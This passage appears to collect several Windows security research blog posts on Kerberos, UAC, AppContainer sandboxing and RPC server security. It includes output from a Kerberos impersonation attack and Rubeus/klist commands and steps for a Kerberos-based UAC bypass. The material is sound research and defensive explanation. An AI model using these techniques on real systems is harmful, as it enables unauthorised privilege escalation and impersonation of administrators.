    However, I recalled when playing with the SAM RPC APIs that there is a SamrChangePasswordUser method which will change a user's password to an arbitrary NT hash. The only requirement is knowledge of the existing NT hash and we can set any new NT hash we like. This doesn't need to honor the password policy, except for the minimum age setting. We don't even need to deal with how to call the RPC API correctly as the SAM DLL exports the SamiChangePasswordUser API which does all the hard work. 

    I took some example C# code written by Vincent Le Toux and plugged that into Rubeus at the correct point, passing the current TGT's session key as the new NT hash. Let's see if it works:

    SamConnect OK
    SamrOpenDomain OK
    rid is 1208
    SamOpenUser OK
    SamiChangePasswordUser OK

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [+] S4U2proxy success!
    [*] base64(ticket.kirbi) for SPN 'cifs/WIN10TEST.domain.local':
          doIG3...

    And it does! Now the caveats:

    • This will obviously only work if RC4 is still enabled on the domain. 
    • You will need the user's password or NT hash. I couldn't think of a way of doing this with only a valid TGT.
    • The user is sacrificial, it might be hard to login using a password afterwards. If you can't immediately reset the password due to the domain's policy the user might be completely broken. 
    • It's not very silent, but that's not my problem.
    • You're probably better to just do the shadow credentials attack, if PKINIT is enabled.
    As I'm feeling lazy I'm not going to provide the changes to Rubeus. Except for the call to SamiChangePasswordUser all the code is already there to perform the attack, it just needs to be wired up. I'm sure they'd welcome the addition.

    Bypassing UAC in the most Complex Way Possible!

    By: tiraniddo
    20 March 2022 at 09:52

    While it's not something I spend much time on, finding a new way to bypass UAC is always amusing. When reading through some of the features of the Rubeus tool I realised that there was a possible way of abusing Kerberos to bypass UAC, well on domain joined systems at least. It's unclear if this has been documented before, this post seems to discuss something similar but relies on doing the UAC bypass from another system, but what I'm going to describe works locally. Even if it has been described as a technique before I'm not sure it's been documented how it works under the hood.

    The Background!

    Let's start with how the system prevents you bypassing the most pointless security feature ever. By default LSASS will filter any network authentication tokens to remove admin privileges if the users is a local administrator. However there's an important exception, if the user a domain user and a local administrator then LSASS will allow the network authentication to use the full administrator token. This is a problem if say you're using Kerberos to authenticate locally. Wouldn't this be a trivial UAC bypass? Just authenticate to the local service as a domain user and you'd get the network token which would bypass the filtering?

    Well no, Kerberos has specific additions to block this attack vector. If I was being charitable I'd say this behaviour also ensures some level of safety.  If you're not running as the admin token then accessing say the SMB loopback interface shouldn't suddenly grant you administrator privileges through which you might accidentally destroy your system.

    Back in January last year I read a post from Steve Syfuhs of Microsoft on how Kerberos prevents this local UAC bypass. The TL;DR; is when a user wants to get a Kerberos ticket for a service LSASS will send a TGS-REQ request to the KDC. In the request it'll embed some security information which indicates the user is local. This information will be embedded in the generated ticket. 

    When that ticket is used to authenticate to the same system Kerberos can extract the information and see if it matches one it knows about. If so it'll take that information and realize that the user is not elevated and filter the token appropriately. Unfortunately much as enjoy Steve's posts this one was especially light on details. I guessed I'd have to track down how it works myself. Let's dump the contents of a Kerberos ticket and see if we can see what could be the ticket information:

    PS> $c = New-LsaCredentialHandle -Package 'Kerberos' -UseFlag Outbound
    PS> $x = New-LsaClientContext -CredHandle $c -Target HOST/$env:COMPUTERNAME
    PS> $key = Get-KerberosKey -HexKey 'XXX' -KeyType AES256_CTS_HMAC_SHA1_96 -Principal $env:COMPTUERNAME
    PS> $u = Unprotect-LsaAuthToken -Token $x.Token -Key $key
    PS> Format-LsaAuthToken $u

    <KerberosV5 KRB_AP_REQ>
    Options         : None
    <Ticket>
    Ticket Version  : 5
    ...

    <Authorization Data - KERB_AD_RESTRICTION_ENTRY>
    Flags           : LimitedToken
    Integrity Level : Medium
    Machine ID      : 6640665F...

    <Authorization Data - KERB_LOCAL>
    Security Context: 60CE03337E01000025FC763900000000

    I've highlighted the two ones of interest, the KERB-AD-RESTRICTION-ENTRY and the KERB-LOCAL entry. Of course I didn't guess these names, these are sort of documented in the Microsoft Kerberos Protocol Extensions (MS-KILE) specification. The KERB_AD_RESTRICTION_ENTRY is most obviously of interest, it contains both the works "LimitedToken" and "Medium Integrity Level"

    When accepting a Kerberos AP-REQ from a network client via SSPI the Kerberos module in LSASS will call the LSA function LsaISetSupplementalTokenInfo to apply the information from KERB-AD-RESTRICTION-ENTRY to the token if needed. The pertinent code is roughly the following:

    NTSTATUS LsaISetSupplementalTokenInfo(PHANDLE phToken, 
                            PLSAP_TOKEN_INFO_INTEGRITY pTokenInfo) {
      // ...
      BOOL bLoopback = FALSE:
      BOOL bFilterNetworkTokens = FALSE;

      if (!memcmp(&LsapGlobalMachineID, pTokenInfo->MachineID,
           sizeof(LsapGlobalMachineID))) {
        bLoopback = TRUE;
      }

      if (LsapGlobalFilterNetworkAuthenticationTokens) {
        if (pTokenInfo->Flags & LimitedToken) {
          bFilterToken = TRUE;
        }
      }

      PSID user = GetUserSid(*phToken);
      if (!RtlEqualPrefixSid(LsapAccountDomainMemberSid, user)
        || LsapGlobalLocalAccountTokenFilterPolicy 
        || NegProductType == NtProductLanManNt) {
        if ( !bFilterToken && !bLoopback )
          return STATUS_SUCCESS;
      }

      /// Filter token if needed and drop integrity level.
    }

    I've highlighted the three main checks in this function, the first compares if the MachineID field of the KERB-AD-RESTRICTION-ENTRY matches the one stored in LSASS. If it is then the bLoopback flag is set. Then it checks an AFAIK undocumented LSA flag to filter all network tokens, at which point it'll check for the LimitedToken flag and set the bFilterToken flag accordingly. This filtering mode defaults to off so in general bFilterToken won't be set.

    Finally the code queries for the current created token SID and checks if any of the following is true:
    • The user SID is not a member of the local account domain.
    • The LocalAccountTokenFilterPolicy LSA policy is non-zero, which disables the local account filtering.
    • The product type is NtProductLanManNt, which actually corresponds to a domain controller.
    If any are true then as long as the token information is neither loopback or filtering is forced the function will return success and no filtering will take place. Therefore in a default installation for a domain user to not be filtered comes down whether the machine ID matches or not. 

    For the integrity level, if filtering is taking place then it will be dropped to the value in the KERB-AD-RESTRICTION-ENTRY authentication data. However it won't increase the integrity level above what the created token has by default, so this can't be abused to get System integrity.

    Note Kerberos will call LsaISetSupplementalTokenInfo with the KERB-AD-RESTRICTION-ENTRY authentication data from the ticket in the AP-REQ first. If that doesn't exist then it'll try calling it with the entry from the authenticator. If neither the ticket or authenticator has an entry then it will never be called. How can we remove these values?

    Well, about that!

    Okay how can we abuse this to bypass UAC? Assuming you're authenticated as a domain user the funniest way to abuse it is get the machine ID check to fail. How would we do that? The LsapGlobalMachineID value is a random value generated when LSASS starts up. We can abuse the fact that if you query the user's local Kerberos ticket cache it will return the session key for service tickets even if you're not an administrator (it won't return TGT session keys by default).

    Therefore one approach is to generate a service ticket for the local system, save the resulting KRB-CRED to disk, reboot the system to get LSASS to reinitialize and then when back on the system reload the ticket. This ticket will now have a different machine ID and therefore Kerberos will ignore the restrictions entry. You could do it with the builtin klist and Rubeus with the following commands:

    PS> klist get RPC/$env:COMPUTERNAME
    PS> Rubeus.exe /dump /server:$env:COMPUTERNAME /nowrap
    ... Copy the base64 ticket to a file.

    Reboot then:

    PS> Rubeus.exe ptt /ticket:<BASE64 TICKET> 

    You can use Kerberos authentication to access the SCM over named pipes or TCP using the RPC/HOSTNAME SPN.  Note the Win32 APIs for the SCM always use Negotiate authentication which throws a spanner in the works, but there are alternative RPC clients ;-) While LSASS will add a valid restrictions entry to the authenticator in the AP-REQ it won't be used as the one in the ticket will be used first which will fail to apply due to the different machine ID.

    The other approach is to generate our own ticket, but won't we need credentials for that? There's a trick, I believe discovered by Benjamin Delpy and put into kekeo that allows you to abuse unconstrained delegation to get a local TGT with a session key. With this TGT you can generate your own service tickets, so you can do the following:
    1. Query for the user's TGT using the delegation trick.
    2. Make a request to the KDC for a new service ticket for the local machine using the TGT. Add a KERB-AD-RESTRICTION-ENTRY but fill in a bogus machine ID.
    3. Import the service ticket into the cache.
    4. Access the SCM to bypass UAC.
    Ultimately this is a reasonable amount lot of code for a UAC bypass, at least compared to the just changing an environment variable. However, you can probably bodge it together using existing tools such as kekeo and Rubeus, but I'm not going to release a turn key tool to do this, you're on your own :-)

    Didn't you forget KERB-LOCAL?

    What is the purpose of KERB-LOCAL? It's a way of reusing the local user's credentials, this is similar to NTLM loopback where LSASS is able to determine that the call is actually from a locally authenticated user and use their interactive token. The value passed in the ticket and authenticator can be checked against a list of known credentials in the Kerberos package and if there's a match the existing token will be used.

    Would this not always eliminate the need for the filtering the token based on the KERB-AD-RESTRICTION-ENTRY value? It seems that this behavior is used very infrequently due to how it's designed. First it only works if the accepting server is using the Negotiate package, it doesn't work if using the Kerberos package directly (sort of...). That's usually not an impediment as most local services use Negotiate anyway for convenience. 

    The real problem is that as a rule if you use Negotiate to the local machine as a client it'll select NTLM as the default. This will use the loopback already built into NTLM rather than Kerberos so this feature won't be used. Note that even if NTLM is disabled globally on the domain network it will still work for local loopback authentication. I guess KERB-LOCAL was added for feature parity with NTLM.

    Going back to the formatted ticket at the start of the blog what does the KERB-LOCAL value mean? It can be unpacked into two 64bit values, 0x17E3303CE60 and 0x3976FC25. The first value is the heap address of the KERB_CREDENTIAL structure in LSASS's heap!! The second value is the ticket count when the KERB-LOCAL structure was created.

    Fortunately LSSAS doesn't just dereference the credentials pointer, it must be in the list of valid credential structures. But the fact that this value isn't blinded or references a randomly generated value seems a mistake as heap addresses would be fairly easy to brute force. Of course it's not quite so simple, Kerberos does verify that the SID in the ticket's PAC matches the SID in the credentials so you can't just spoof the SYSTEM session, but well, I'll leave that as a thought to be going on with.

    Hopefully this gives some more insight into how this feature works and some fun you can have trying to bypass UAC in a new way.

    UPDATE: This simple C++ file can be used to modify the Win32 SCM APIs to use Kerberos for local authentication.

    LowBox Token Permissive Learning Mode

    By: tiraniddo
    7 September 2021 at 06:53

    I was recently asked about this topic and so I thought it'd make sense to put it into a public blog post so that everyone can benefit. Windows 11 (and Windows Server 2022) has a new feature for tokens which allow the kernel to perform the normal LowBox access check, but if it fails log the error rather than failing with access denied. 

    This feature allows you to start an AppContainer sandbox process, run a task, and determine what parts of that would fail if you actually tried to sandbox a process. This makes it much easier to determine what capabilities you might need to grant to prevent your application from crashing if you tried to actually apply the sandbox. It's a very useful diagnostic tool, although whether it'll be documented by Microsoft remains to be seen. Let's go through a quick example of how to use it.

    First you need to start an ETW trace for the Microsoft-Windows-Kernel-General provider with the KERNEL_GENERAL_SECURITY_ACCESSCHECK keyword (value 0x20) enabled. In an administrator PowerShell console you can run the following:

    PS> $name = 'AccessTrace'
    PS> New-NetEventSession -Name $name -LocalFilePath "$env:USERPROFILE\access_trace.etl" | Out-Null
    PS> Add-NetEventProvider -SessionName $name -Name "Microsoft-Windows-Kernel-General" -MatchAllKeyword 0x20 | Out-Null
    PS> Start-NetEventSession -Name $name

    This will start the trace session and log the events to access_trace.etl file if your home directory. As this is ETW you could probably do a real-time trace or enable stack tracing to find out what code is actually failing, however for this example we'll do the least amount of work possible. This log is also used for things like Adminless which I've blogged about before.

    Now you need to generate some log events. You just need to add the permissiveLearningMode capability when creating the lowbox token or process. You can almost certainly add it to your application's manifest as well when developing a sandboxed UWP application, but we'll assume here that we're setting up the sandbox manually.

    PS> $cap = Get-NtSid -CapabilityName 'permissiveLearningMode'
    PS> $token = Get-NtToken -LowBox -PackageSid ABC -CapabilitySid $cap
    PS> Invoke-NtToken $token { "Hello" | Set-Content "$env:USERPOFILE\test.txt" }

    The previous code creates a lowbox token with the capability and writes to a file in the user's profile. This would normally fail as the user's profile doesn't grant any AppContainer access to write to it. However, you should find the write succeeded. Now, back in the admin PowerShell console you'll want to stop the trace and cleanup the session.

    PS> Stop-NetEventSession -Name $name
    PS> Remove-NetEventSession -Name $name

    You should find an access_trace.etl file in your user's profile directory which will contain the logged events. There are various ways to read this file, the simplest is to use the Get-WinEvent command. As you need to do a bit of parsing of the contents of the log to get out various values I've put together a simple script do that. It's available on github here. Just run the script passing the name of the log file to convert the events into PowerShell objects.

    PS> parse_access_check_log.ps1 "$env:USERPROFILE\access_trace.etl"
    ProcessName        : ...\v1.0\powershell.exe
    Mask               : MaximumAllowed
    PackageSid         : S-1-15-2-1445519891-4232675966-...
    Groups             : INSIDERDEV\user
    Capabilities       : NAMED CAPABILITIES\Permissive Learning Mode
    SecurityDescriptor : O:BAG:BAD:(A;OICI;KA;;;S-1-5-21-623841239-...

    The log events don't seem to contain the name of the resource being opened, but it does contain the security descriptor and type of the object, what access mask was requested and basic information about the access token used. Hopefully this information is useful to someone.

    How the Windows Firewall RPC Filter Works

    By: tiraniddo
    22 August 2021 at 05:32

    I did promise that I'd put out a blog post on how the Windows RPC filter works. Now that I released my more general blog post on the Windows firewall I thought I'd come back to a shorter post about the RPC filter itself. If you don't know the context, the Windows firewall has the ability to restrict access to RPC interfaces. This is interesting due to the renewed interest in all things RPC, especially the PetitPotam trick. For example you can block any access to the EFSRPC interfaces using the following script which you run with the netsh command.

    rpc
    filter
    add rule layer=um actiontype=block
    add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
    add filter
    add rule layer=um actiontype=block
    add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
    add filter
    quit

    This script adds two rules which will block any calls on the RPC interfaces with UUIDs of c681d488-d850-11d0-8c52-00c04fd90f7e and df1941c5-fe89-4e79-bf10-463657acf44d. These correspond to the two EFSRPC interfaces.

    How does this work within the context of the firewall? Does the kernel components of the Windows Filtering Platform have a builtin RPC protocol parser to block the connection? That'd be far too complex, instead everything is done in user-mode by some special layers. If you use NtObjectManager's firewall Get-FwLayer command you can check for layers registered to run in user-mode by filtering on the IsUser property.

    PS> Get-FwLayer | Where-Object IsUser
    KeyName                      Name
    -------                      ----
    FWPM_LAYER_RPC_PROXY_CONN    RPC Proxy Connect Layer
    FWPM_LAYER_IPSEC_KM_DEMUX_V4 IPsec KM Demux v4 Layer
    FWPM_LAYER_RPC_EP_ADD        RPC EP ADD Layer
    FWPM_LAYER_KM_AUTHORIZATION  Keying Module Authorization Layer
    FWPM_LAYER_IKEEXT_V4         IKE v4 Layer
    FWPM_LAYER_IPSEC_V6          IPsec v6 Layer
    FWPM_LAYER_IPSEC_V4          IPsec v4 Layer
    FWPM_LAYER_IKEEXT_V6         IKE v6 Layer
    FWPM_LAYER_RPC_UM            RPC UM Layer
    FWPM_LAYER_RPC_PROXY_IF      RPC Proxy Interface Layer
    FWPM_LAYER_RPC_EPMAP         RPC EPMAP Layer
    FWPM_LAYER_IPSEC_KM_DEMUX_V6 IPsec KM Demux v6 Layer

    In the output we can see 5 layers with RPC in the name of the layer. 
    • FWPM_LAYER_RPC_EP_ADD - Filter new endpoints created by a process.
    • FWPM_LAYER_RPC_EPMAP - Filter access to endpoint mapper information.
    • FWPM_LAYER_RPC_PROXY_CONN - Filter connections to the RPC proxy.
    • FWPM_LAYER_RPC_PROXY_IF - Filter interface calls through an RPC proxy.
    • FWPM_LAYER_RPC_UM - Filter interface calls to an RPC server
    Each of these layers is potentially interesting, and you can add rules through netsh for all of them. But we'll just focus on how the FWPM_LAYER_RPC_UM layer works as that's the one the script introduced at the start works with. If you run the following command after adding the RPC filter rules you can view the newly created rules:

    PS> Get-FwFilter -LayerKey FWPM_LAYER_RPC_UM -Sorted | Format-FwFilter
    Name       : RPCFilter
    Action Type: Block
    Key        : d4354417-02fa-11ec-95da-00155d010a06
    Id         : 78253
    Description: RPC Filter
    Layer      : FWPM_LAYER_RPC_UM
    Sub Layer  : FWPM_SUBLAYER_UNIVERSAL
    Flags      : Persistent
    Weight     : 567453553048682496
    Conditions :
    FieldKeyName               MatchType Value
    ------------               --------- -----
    FWPM_CONDITION_RPC_IF_UUID Equal     df1941c5-fe89-4e79-bf10-463657acf44d


    Name       : RPCFilter
    Action Type: Block
    Key        : d4354416-02fa-11ec-95da-00155d010a06
    Id         : 78252
    Description: RPC Filter
    Layer      : FWPM_LAYER_RPC_UM
    Sub Layer  : FWPM_SUBLAYER_UNIVERSAL
    Flags      : Persistent
    Weight     : 567453553048682496
    Conditions :
    FieldKeyName               MatchType Value
    ------------               --------- -----
    FWPM_CONDITION_RPC_IF_UUID Equal     c681d488-d850-11d0-8c52-00c04fd90f7e

    If you're read my general blog post the output should made some sense. The FWPM_CONDITION_RPC_IF_UUID condition key is used to specify the UUID for the interface to match on. The FWPM_LAYER_RPC_UM has many possible fields to filter on, which you can query by inspecting the layer object's Fields property.

    PS> (Get-FwLayer -Key FWPM_LAYER_RPC_UM).Fields

    KeyName                              Type      DataType
    -------                              ----      --------
    FWPM_CONDITION_REMOTE_USER_TOKEN     RawData   TokenInformation
    FWPM_CONDITION_RPC_IF_UUID           RawData   ByteArray16
    FWPM_CONDITION_RPC_IF_VERSION        RawData   UInt16
    FWPM_CONDITION_RPC_IF_FLAG           RawData   UInt32
    FWPM_CONDITION_DCOM_APP_ID           RawData   ByteArray16
    FWPM_CONDITION_IMAGE_NAME            RawData   ByteBlob
    FWPM_CONDITION_RPC_PROTOCOL          RawData   UInt8
    FWPM_CONDITION_RPC_AUTH_TYPE         RawData   UInt8
    FWPM_CONDITION_RPC_AUTH_LEVEL        RawData   UInt8
    FWPM_CONDITION_SEC_ENCRYPT_ALGORITHM RawData   UInt32
    FWPM_CONDITION_SEC_KEY_SIZE          RawData   UInt32
    FWPM_CONDITION_IP_LOCAL_ADDRESS_V4   IPAddress UInt32
    FWPM_CONDITION_IP_LOCAL_ADDRESS_V6   IPAddress ByteArray16
    FWPM_CONDITION_IP_LOCAL_PORT         RawData   UInt16
    FWPM_CONDITION_PIPE                  RawData   ByteBlob
    FWPM_CONDITION_IP_REMOTE_ADDRESS_V4  IPAddress UInt32
    FWPM_CONDITION_IP_REMOTE_ADDRESS_V6  IPAddress ByteArray16

    There's quite a few potential configuration options for the filter. You can filter based on the remote user token that's authenticated to the interface. Or you can filters based on the authentication level and type. This could allow you to protect an RPC interface so that all callers have to use Kerberos with at RPC_C_AUTHN_LEVEL_PKT_PRIVACY level. 

    Anyway, configuring it is less important to us, you probably want to know how it works, as the first step to trying to find a way to bypass it is to know where this filter layer is processed (note, I've not found a bypass, but you never know). 

    Perhaps unsurprisingly due to the complexity of the RPC protocol the filtering is implemented within the RPC server process through the RpcRtRemote extension DLL. Except for RPCSS this DLL isn't loaded by default. Instead it's only loaded if there exists a value for the WNF_RPCF_FWMAN_RUNNING WNF state. The following shows the state after adding the two RPC filter rules with netsh.

    PS> $wnf = Get-NtWnf -Name 'WNF_RPCF_FWMAN_RUNNING'
    PS> $wnf.QueryStateData()

    Data ChangeStamp
    ---- -----------
    {}             2

    The RPC runtime sets up a subscription to load the DLL if the WNF value is ever changed. Once loaded the RPC runtime will register all current interfaces to check the firewall. The filter rules are checked when a call is made to the interface during the normal processing of the security callback. The runtime will invoke the FwFilter function inside RpcRtRemote, passing all the details about the firewall interface call. The filter call is only made for DCE/RPC protocols, so not ALPC. It also will only be called if the caller is remote. This is always the case if the call comes via TCP, but for named pipes it will only be called if the pipe was opened via SMB.

    Here's where we can finally determine how the RPC filter is processed. The FwFilter function builds a list of firewall values corresponding to the list of fields for the FWPM_LAYER_RPC_UM layer and passes them to the FwpsClassifyUser0 API along with the numeric ID of the layer. This API will enumerate all filters for the layer and apply the condition checks returning the classification, e.g. block or permit. Based on this classification the RPC runtime can permit or refuse the call. 

    In order for a filter to be accessible for classification the RPC server must have FWPM_ACTRL_OPEN access to the engine and FWPM_ACTRL_CLASSIFY access to the filter. By default the Everyone group has these access rights, however AppContainers and potentially other sandboxes do not. However, in general AppContainer processes don't tend to create privileged RPC servers, at least any which a remote attacker would find useful. You can check the access on various firewall objects using the Get-AccessibleFwObject command.

    PS> $token = Get-NtToken -Filtered -Flags LuaToken
    PS> Get-AccessibleFwObject -Token $token | Where-Object Name -eq RPCFilter

    TokenId Access             Name
    ------- ------             ----
    4ECF80  Classify|Open RPCFilter
    4ECF80  Classify|Open RPCFilter

    I hope this gives enough information for someone to dig into it further to see if there's any obvious bypass I missed. I'm sure there's probably some fun trick you could do to circumvent restrictions if you look hard enough :-)

    How to secure a Windows RPC Server, and how not to.

    By: tiraniddo
    15 August 2021 at 02:04

    The PetitPotam technique is still fresh in people's minds. While it's not directly an exploit it's a useful step to get unauthenticated NTLM from a privileged account to forward to something like the AD CS Web Enrollment service to compromise a Windows domain. Interestingly after Microsoft initially shrugged about fixing any of this they went and released a fix, although it seems to be insufficient at the time of writing.

    While there's plenty of details about how to abuse the EFSRPC interface, there's little on why it's exploitable to begin with. I thought it'd be good to have a quick overview of how Windows RPC interfaces are secured and then by extension why it's possible to use the EFSRPC interface unauthenticated. 

    Caveat: No doubt I might be missing other security checks in RPC, these are the main ones I know about :-)

    RPC Server Security

    The server security of RPC is one which has seemingly built up over time. Therefore there's various ways of doing it, and some ways are better than others. There are basically three approaches, which can be mixed and matched:
    1. Securing the endpoint
    2. Securing the interface
    3. Ad-hoc security
    Let's take each one in turn to determine how each one secures the RPC server.

    Securing the Endpoint

    You register the endpoint that the RPC server will listen on using the RpcServerUseProtseqEp API. This API takes the type of endpoint, such as ncalrpc (ALPC), ncacn_np (named pipe) or ncacn_ip_tcp (TCP socket) and creates the listening endpoint. For example the following would create a named pipe endpoint called DEMO.

    RpcServerUseProtseqEp(
        L"ncacn_np",
        RPC_C_PROTSEQ_MAX_REQS_DEFAULT,
        L"\\pipe\\DEMO",
        nullptr);

    The final parameter is optional but represents a security descriptor (SD) you assign to the endpoint to limit who has access. This can only be enforced on ALPC and named pipes as something like a TCP socket doesn't (technically) have an access check when it's connected to. If you don't specify an SD then a default is assigned. For a named pipe the default DACL grants the following uses write access:
    • Everyone
    • NT AUTHORITY\ANONYMOUS LOGON
    • SELF
    Where SELF is the creating user's SID. This is a pretty permissive SD. One interesting thing about RPC endpoints is they are multiplexed. You don't explicit associate an endpoint with the RPC interface you want to access. Instead you can connect to any endpoint that the process has created. The end result is that if there's a less secure endpoint in the same process it might be possible to access an interface using the least secure one. In general this makes relying on endpoint security risky, especially in processes which run multiple services, such as LSASS. In any case if you want to use a TCP endpoint you can't rely on the endpoint security as it doesn't exist.

    Securing the Interface

    The next way of securing the RPC server is to secure the interface itself. You register the interface structure that was generated by MIDL using one of the following APIs:
    Each has a varying number of parameters some of which determine the security of the interface. The latest APIs are RpcServerRegisterIf3 and RpcServerInterfaceGroupCreate which were introduced in Windows 8. The latter is just a way of registering multiple interfaces in one call so we'll just focus on the former. The RpcServerRegisterIf3 has three parameters which affect security, SecurityDescriptor, IfCallback and Flags. 

    The SecurityDescriptor parameter is easiest to explain. It assigns an SD to the interface, when a call is made on that interface then the caller's token is checked against the SD and access is only granted if the check passes. If no SD is specified a default is used which grants the following SIDs access (assuming a non-AppContainer process)
    • NT AUTHORITY\ANONYMOUS LOGON
    • Everyone
    • NT AUTHORITY\RESTRICTED
    • BUILTIN\Administrators
    • SELF
    The token to use for the access check is based either on the client's authentication (we'll discuss this later) or the authentication for the endpoint. ALPC and named pipe are authenticated transports, where as TCP is not. When using an unauthenticated transport the access check will be against the anonymous token. This means if the SD does not contain an allow ACE for ANONYMOUS LOGON it will be blocked.

    Note, due to a quirk of the access check process the RPC runtime grants access if the caller has any access granted, not a specific access right. What this means is that if the caller is considered the owner, which is normally set to the creating user SID they might only be granted READ_CONTROL but that's sufficient to bypass the check. This could also be useful if the caller has SeTakeOwnershipPrivilege or similar as it'd be possible to generically bypass the interface SD check (though of course that privilege is dangerous in its own right).

    The second parameter, IfCallback, takes an RPC_IF_CALLBACK function pointer. This callback function will be invoked when a call is made to the interface, although it will be called after the SD is checked. If the callback function returns RPC_S_OK then the call will be allowed, anything else will deny the call. The callback gets a pointer to the interface and the binding handle and can do various checks to determine if the caller is allowed to access the interface.

    A common check is for the client's authentication level. The client can specify the level to use when connecting to the server using the RpcBindingSetAuthInfo API however the server can't directly specify the minimum authentication level it accepts. Instead the callback can use the RpcBindingInqAuthClient API to determine what the client used and grant or deny access based on that. The authentication levels we typically care about are as follows:
    • RPC_C_AUTHN_LEVEL_NONE - No authentication
    • RPC_C_AUTHN_LEVEL_CONNECT - Authentication at connect time, but not per-call.
    • RPC_C_AUTHN_LEVEL_PKT_INTEGRITY - Authentication at connect time, each call has integrity protection.
    • RPC_C_AUTHN_LEVEL_PKT_PRIVACY - Authentication at connect time, each call is encrypted and has integrity protection.
    The authentication is implemented using a defined authentication service, such as NTLM or Kerberos, though that doesn't really matter for our purposes. Also note that this is only used for RPC services available over remote protocols such as named pipes or TCP. If the RPC server listens on ALPC then it's assumed to always be RPC_C_AUTHN_LEVEL_PKT_PRIVACY. Other checks the server could do would be the protocol sequence the client used, this would allow rejecting access via TCP but permit named pipes.

    The final parameter is the flags. The flag most obviously related to security is RPC_IF_ALLOW_SECURE_ONLY (0x8). This blocks access to the interface if the current authentication level is RPC_C_AUTHN_LEVEL_NONE. This means the caller must be able to authenticate to the server using one of the permitted authentication services. It's not sufficient to use a NULL session, at least on any modern version of Windows. Of course this doesn't say much about who has authenticated, a server might still want to check the caller's identity.

    The other important flag is RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH (0x10). If the server specifies a security callback and this flag is not set then any unauthenticated client will be automatically rejected. 

    If this wasn't complex enough there's at least one other related setting which applies system wide which will determine what type of clients can access what RPC server. The Restrict Unauthenticated RPC Clients group policy. By default this is set to None if the RPC server is running on a server SKU of Windows and Authenticated on a client SKU. 

    In general what this policy does is limit whether a client can use an unauthenticated transport such as TCP when they haven't also separately authenticated to an valid authentication level. When set to None RPC servers can be accessed via an unauthenticated transport subject to any other restrictions the interface is registered with. If set to Authenticated then calls over unauthenticated transports are rejected, unless the RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag is set for the interface or the client has authenticated separately. There's a third option, Authenticated without exceptions, which will block the call in all circumstances if the caller isn't using an authenticated transport. 

    Ad-hoc Security

    The final types of checks are basically anything else the server does to verify the caller. A common approach would be to perform a check within a specific function on the interface. For example, a server could generally allow unauthenticated clients, except when calling a method to read a important secret value. At that point is could insert an authentication level check to ensure the client has authenticated at RPC_C_AUTHN_LEVEL_PKT_PRIVACY so that the secret will be encrypted when returned to the client. 

    Ultimately you'll have to check each function you're interested in to determine what, if any, security checks are in place. As with all ad-hoc checks it's possible that there's a logic bug in there which can be exploited to bypass the security restrictions.

    Digging into EFSRPC

    Okay, that covers the basics of how an RPC server is secured. Let's look at the specific example of the EFSRPC server abused by PetitPotam. Oddly there's two implementation of the RPC server, one in efslsaext.dll which the interface UUID of c681d488-d850-11d0-8c52-00c04fd90f7e and one in efssvc.dll with the interface UUID of df1941c5-fe89-4e79-bf10-463657acf44d. The one in efslsaext.dll is the one which is accessible unauthenticated, so let's start there. We'll go through the three approaches to securing the server to determine what it's doing.

    First, the server does not register any of its own protocol sequences, with SDs or not. What this means is who can call the RPC server is dependent on what other endpoints have been registered by the hosting process, which in this case is LSASS.

    Second, checking the for calls to one of the RPC server interface registration functions there's a single call to RpcServerRegisterIfEx in InitializeLsaExtension. This allows the caller to specify the security callback but not an SD. However in this case it doesn't specify any security callback. The InitializeLsaExtension function also does not specify either of the two security flags (it sets RPC_IF_AUTOLISTEN which doesn't have any security impact). This means that in general any authenticated caller is permitted.

    Finally, from an ad-hoc security perspective all the main functions such as EfsRpcOpenFileRaw call the function EfsRpcpValidateClientCall which looks something like the following (error check removed).

    void EfsRpcpValidateClientCall(RPC_BINDING_HANDLE Binding, 
                                   PBOOL ValidClient) {
      unsigned int ClientLocalFlag;
      I_RpcBindingIsClientLocal(NULL, &ClientLocalFlag);
      if (!ClientLocalFlag) {
        RPC_WSTR StringBinding;
        RpcBindingToStringBindingW(Binding, &StringBinding);
        RpcStringBindingParseW(StringBinding, NULL, &Protseq, 
                               NULL, NULL, NULL);
        if (CompareStringW(LOCALE_INVARIANT, NORM_IGNORECASE, 
            Protseq, -1, L"ncacn_np", -1) == CSTR_EQUAL)
            *ValidClient = TRUE;
        }
      }
    }

    Basically the ValidClient parameter will only be set to TRUE if the caller used the named pipe transport and the pipe wasn't opened locally, i.e. the named pipe was opened over SMB. This is basically all the security that's being checked for. Therefore the only security that could be enforced is limited by who's allowed to connect to a suitable named pipe endpoint.

    At a minimum LSASS registers the \pipe\lsass named pipe endpoint. When it's setup in lsasrv.dll a SD is defined for the named pipe that grants the following users access:
    • Everyone
    • NT AUTHORITY\ANONYMOUS LOGON
    • BUILTIN\Administrators
    Therefore in theory the anonymous user has access to the pipe, and as there are no other security checks in place in the interface definition. Now typically anonymous access isn't granted by default to named pipes via a NULL session, however domain controllers have an exception to this policy through the configured Network access: Named Pipes that can be accessed anonymously security option. For DCs this allows lsarpc, samr and netlogon pipes, which are all aliases for the lsass pipe, to be accessed anonymously.

    You can now understand why the EFS RPC server is accessible anonymously on DCs. How does the other EFS RPC server block access? In that case it specifies an interface SD to limit access to only the Everyone group and BUILTIN\Administrators. By default the anonymous user isn't a member of Everyone (although it can be configured as such) therefore this blocks access even if you connected via the lsass pipe.

    The Fix is In

    What did Microsoft do to fix PetitPotam? One thing they definitely didn't do is change the interface registration or the named pipe endpoint security. Instead they added an additional ad-hoc check to EfsRpcOpenFileRaw. Specifically they added the following code:

    DWORD AllowOpenRawDL = 0;
    RegGetValueW(
      HKEY_LOCAL_MACHINE,
      L"SYSTEM\\CurrentControlSet\\Services\\EFS",
      L"AllowOpenRawDL",
      RRF_RT_REG_DWORD | RRF_ZEROONFAILURE,
      NULL,
      &AllowOpenRawDL);
    if (AllowOpenRawDL == 1 && 
        !EfsRpcpValidateClientCall(hBinding, &ValidClient) && ValidClient) {
      // Call allowed.
    }

